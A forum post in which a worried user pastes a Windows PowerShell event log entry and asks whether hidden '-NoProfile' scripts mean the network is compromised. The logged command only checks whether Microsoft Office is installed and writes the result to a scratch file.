We seem to be getting a lot of strange traffic on our network lately, and ive been digging through some logs and am wondering if our systems have been compromised and going undetected by someone or someone's exploiting PowerShell and using it to run
various scripts/commands and what not.
This is all over my head though, so if anyone can give me some direction with some of these scripts that are showing up in event viewer and let me know if these are organic processes or no? Im suspecting they arent, and im just basing that on the fact all
these scripts are operating under "-NoProfile"... But i honestly have no idea. All i know, is there is a lot of strange network activity and connections, and i have also been getting non stopped Ddos attacks.
Script:
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.18362.1171
HostId=95e18379-62d1-4071-8527-d6670d0a13be
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command & { $isOfficeInstalled = Get-AppxPackage Microsoft.Office.Desktop -allusers; if ($isOfficeInstalled
-eq $null) { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '0' -Encoding ascii; } else { Out-File -FilePath 'Centennial.Detection.IsCentennialOfficeInstalled.scratch' -InputObject '1' -Encoding ascii } }
EngineVersion=5.1.18362.1171
RunspaceId=1683da92-effe-4dfd-9404-ef09f9a73308
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Need help with powershell - Suspecting unauthorized remote access
https://thesystemcenterblog.com
LinkedIn: 
